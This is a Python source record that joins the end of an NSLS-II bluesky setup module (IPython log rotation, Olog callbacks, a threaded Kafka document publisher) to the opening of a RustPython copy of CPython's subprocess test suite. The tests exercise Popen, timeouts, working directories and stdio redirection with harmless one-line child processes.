f" using default file path '{bluesky_ipython_log_file_path}'",
file=sys.stderr,
)
# before starting ipython logging check the size of the ipython log file
# if the ipython log file has grown large make a copy and start a new one
# if a previous copy exists just overwrite it
if (
bluesky_ipython_log_file_path.exists()
and os.path.getsize(bluesky_ipython_log_file_path) >= rotate_file_size
):
bluesky_ipython_log_file_path.rename(
str(bluesky_ipython_log_file_path) + ".old"
)
# ipython gives a warning if logging fails to start, for example if the log
# directory does not exist. Convert that warning to an exception here.
with warnings.catch_warnings():
warnings.simplefilter(action="error")
# specify the file for ipython logging output
ipython.magic(f"logstart -o -t {bluesky_ipython_log_file_path} append")
return bluesky_ipython_log_file_path
def configure_olog(user_ns, *, callback=None, subscribe=True):
"""
Setup a callback that publishes some metadata from the RunEngine to Olog.
Also, add the public contents of pyOlog.ophyd_tools to the namespace.
This is expected to be run after :func:`configure_base`. It expects to find
an instance of RunEngine named ``RE`` in the user namespace. Additionally,
if the user namespace contains the name ``logbook``, that is expected to be
an instance ``pyOlog.SimpleOlogClient``.
Parameters
----------
user_ns: dict
a namespace --- for example, ``get_ipython().user_ns``
callback : callable, optional
a hook for customizing the logbook_cb_factory; if None a default is
used
subscribe : boolean, optional
True by default. Set to False to skip the subscription. (You still get
pyOlog.ophyd_tools.)
Returns
-------
names : list
list of names added to the namespace
Examples
--------
Configure the Olog.
>>>> configure_olog(get_ipython().user_ns);
"""
# Conceptually our task is simple: add a subscription to the RunEngine that
# publishes to the Olog using the Python wrapper of its REST API, pyOlog.
# In practice this is messy because we have deal with the many-layered API
# of pyOlog and, more importantly, ensure that slowness or errors from the
# Olog do not affect the run. Historically the Olog deployment has not been
# reliable, so it is important to be robust against these issues. Of
# course, by ignoring Olog errors, we leave gaps in the log, which is not
# great, but since all data is saved to a databroker anyway, we can always
# re-generate them later.
ns = {} # We will update user_ns with this at the end.
from bluesky.callbacks.olog import logbook_cb_factory
from functools import partial
from pyOlog import SimpleOlogClient
import queue
import threading
from warnings import warn
# This is for pyOlog.ophyd_tools.get_logbook, which simply looks for
# a variable called 'logbook' in the global IPython namespace.
if "logbook" in user_ns:
simple_olog_client = user_ns["logbook"]
else:
simple_olog_client = SimpleOlogClient()
ns["logbook"] = simple_olog_client
if subscribe:
if callback is None:
# list of logbook names to publish to
LOGBOOKS = ("Data Acquisition",)
generic_logbook_func = simple_olog_client.log
configured_logbook_func = partial(generic_logbook_func, logbooks=LOGBOOKS)
callback = logbook_cb_factory(configured_logbook_func)
def submit_to_olog(queue, cb):
while True:
name, doc = queue.get() # waits until document is available
try:
cb(name, doc)
except Exception as exc:
warn(
"This olog is giving errors. This will not be logged."
"Error:" + str(exc)
)
olog_queue = queue.Queue(maxsize=100)
olog_thread = threading.Thread(
target=submit_to_olog, args=(olog_queue, callback), daemon=True
)
olog_thread.start()
def send_to_olog_queue(name, doc):
try:
olog_queue.put((name, doc), block=False)
except queue.Full:
warn("The olog queue is full. This will not be logged.")
RE = user_ns["RE"]
RE.subscribe(send_to_olog_queue, "start")
import pyOlog.ophyd_tools
import_star(pyOlog.ophyd_tools, ns)
user_ns.update(ns)
return list(ns)
def migrate_metadata():
"""
Copy metadata from (old) sqlite-backed file to (new) directory of msgpack.
"""
from bluesky.utils import get_history, PersistentDict
old_md = get_history()
directory = os.path.expanduser("~/.config/bluesky/md")
os.makedirs(directory, exist_ok=True)
new_md = PersistentDict(directory)
new_md.update(old_md)
def _subscribe_kafka_publisher(RE, publisher_queue, kafka_publisher, publisher_queue_timeout=1):
"""
Set up an indirect connection between RE and Kafka publisher using a queue and a thread.
The function performs two tasks:
1) define function put_document_on_publisher_queue and subscribe it to the RE
2) define function publish_documents_from_publisher_queue and run it in a thread
This function is not intended for use outside this module.
Parameters
----------
RE: bluesky RunEngine
documents published by this RE will be published as Kafka messages
publisher_queue: queue.Queue
a RunEngine will place (name, document) tuples on this queue
kafka_publisher: bluesky_kafka.Publisher
publishes (name, document) tuples as Kafka messages on a beamline-specific topic
publisher_queue_timeout: float
time in seconds to wait for a document to become available on the publisher_queue
before checking if the publisher thread should terminate; default is 1s
Returns
-------
put_document_re_token
RE subscription token corresponding to put_document_on_publisher_queue
publisher_thread
threading.Thread responsible for running function publishe_documents_from_publisher_queue
publisher_thread_stop_event
call set() on this threading.Event to terminate publisher_thread
"""
def put_document_on_publisher_queue(name_, document_):
"""
This function is intended to be subscribed to a RunEngine.
When a RunEngine publishes a (name, document) tuple this
function puts that tuple on publisher_queue. It is expected
that a function running on a separate thread will take
(name, document) tuples off publisher_queue and publish them
as Kafka messages.
Parameters
----------
name_: str
bluesky document name such as "start", "descriptor", etc.
document_: dict
bluesky document dictionary
"""
publisher_queue.put((name_, document_))
def publish_documents_from_publisher_queue(
publisher_queue_,
kafka_publisher_,
publisher_thread_stop_event_,
publisher_queue_timeout_=1,
):
"""
This function is intended to execute in a dedicated thread. It defines
a polling loop that takes (name, document) tuples from publisher_queue_
as they become available and uses kafka_publisher_ to publish those
tuples as Kafka messages on a beamline-specific topic.
The intention is to separate a RunEngine from a Publisher in order
to insulate plans from Publisher failures that might otherwise interrupt
data collection.
Parameters
---------
publisher_queue_: queue.Queue
a RunEngine will place (name, document) tuples on this queue
kafka_publisher_: bluesky_kafka.Publisher
publishes (name, document) tuples as Kafka messages on a beamline-specific topic
publisher_thread_stop_event_: threading.Event
the polling loop will terminate cleanly if kafka_publisher_thread_stop_event_ is set
publisher_queue_timeout_: float
time in seconds to wait for a document to become available on the publisher_queue_
before checking if kafka_publisher_thread_stop_event_ has been set
"""
name_ = None
document_ = None
published_document_count = 0
nslsii_logger = logging.getLogger("nslsii")
nslsii_logger.info("starting Kafka message publishing loop")
while not publisher_thread_stop_event_.is_set():
try:
name_, document_ = publisher_queue_.get(timeout=publisher_queue_timeout_)
kafka_publisher_(name_, document_)
published_document_count += 1
except queue.Empty:
# publisher_queue_.get() timed out waiting for a new document
# the while condition will now be checked to see if someone
# has requested that this thread terminate
# if not then try again to get a new document from publisher_queue_
pass
except BaseException:
# something bad happened while trying to publish a Kafka message
# log the exception and continue taking documents from publisher_queue_
nslsii_logger.exception(
"an error occurred after %d successful Kafka messages when '%s' "
"attempted to publish on topic %s\nname: '%s'\ndoc '%s'",
published_document_count,
kafka_publisher_,
kafka_publisher_.topic,
name_,
document_,
)
publisher_thread_stop_event = threading.Event()
publisher_thread = threading.Thread(
name="kafka-publisher-thread",
target=publish_documents_from_publisher_queue,
args=(publisher_queue, kafka_publisher, publisher_thread_stop_event, publisher_queue_timeout),
daemon=True
)
publisher_thread.start()
nslsii_logger = logging.getLogger("nslsii")
nslsii_logger.info("Kafka publisher thread has started")
put_document_re_token = RE.subscribe(put_document_on_publisher_queue)
return put_document_re_token, publisher_thread, publisher_thread_stop_event
def _build_and_subscribe_kafka_publisher(RE, beamline_name, bootstrap_servers, producer_config, publisher_queue_timeout=1):
"""
Create and start a separate thread to publish bluesky documents as Kafka
messages on a beamline-specific topic.
This function performs three tasks:
1) verify a Kafka broker with the expected beamline-specific topic is available
2) instantiate a bluesky_kafka.Publisher with the expected beamline-specific topic
3) delegate connecting the RunEngine and Publisher to _subscribe_kafka_publisher
Parameters
----------
RE: RunEngine
the RunEngine to which the RunRouter will be subscribed
beamline_name: str
beamline name, for example "csx", to be used in building the
Kafka topic to which messages will be published
bootstrap_servers: str
Comma-delimited list of Kafka server addresses or hostnames and ports as a string
such as ``'kafka1:9092,kafka2:9092``
producer_config: dict
dictionary of Kafka Producer configuration settings
Returns
-------
topic: str
the Kafka topic on which bluesky documents will be published, for example
"csx.bluesky.runengine.documents"
publisher_thread_re_token: int
RunEngine subscription token corresponding to the function subscribed to the RunEngine
that places (name, document) tuples on the publisher queue. This token is needed to
un-subscribe the function from the RunEngine, in case someone ever wants to do that.
"""
from bluesky_kafka import BlueskyKafkaException, Publisher
from bluesky_kafka.utils import list_topics
nslsii_logger = logging.getLogger("nslsii")
publisher_queue = queue.Queue()
beamline_runengine_topic = None
kafka_publisher_token = None
publisher_thread_stop_event = None
try:
nslsii_logger.info(
"connecting to Kafka broker(s): '%s'", bootstrap_servers
)
beamline_runengine_topic = f"{beamline_name.lower()}.bluesky.runengine.documents"
# verify the topic for this beamline exists on the Kafka broker(s)
topic_to_topic_metadata = list_topics(bootstrap_servers=bootstrap_servers)
if beamline_runengine_topic in topic_to_topic_metadata:
# the beamline topic exists
kafka_publisher = Publisher(
topic=beamline_runengine_topic,
bootstrap_servers=bootstrap_servers,
key=str(uuid.uuid4()),
producer_config=producer_config,
flush_on_stop_doc=True
)
kafka_publisher_token, kafka_publisher_thread, publisher_thread_stop_event = _subscribe_kafka_publisher(
RE=RE,
publisher_queue=publisher_queue,
kafka_publisher=kafka_publisher,
publisher_queue_timeout=publisher_queue_timeout
)
nslsii_logger.info("RunEngine will publish bluesky documents on Kafka topic '%s'", beamline_runengine_topic)
else:
raise BlueskyKafkaException(
f"topic `{beamline_runengine_topic}` does not exist on Kafka broker(s) `{bootstrap_servers}`",
)
except BaseException:
"""
An exception at this point means bluesky documents
will not be published as Kafka messages.
"""
nslsii_logger.exception(
"RunEngine is not able to publish bluesky documents as Kafka messages on topic '%s'",
beamline_runengine_topic
)
return beamline_runengine_topic, publisher_thread_stop_event, kafka_publisher_token
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_check_output_input_none_text = unittest.expectedFailure(test_check_output_input_none_text)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_executable_takes_precedence = unittest.expectedFailure(test_executable_takes_precedence)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
# TODO: RUSTPYTHON
if sys.platform != "win32":
test_cwd_with_absolute_arg = unittest.expectedFailure(test_cwd_with_absolute_arg)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, takes a long time")
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
@unittest.skipIf(sys.platform != "win32", "TODO: RUSTPYTHON, takes a long time")
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
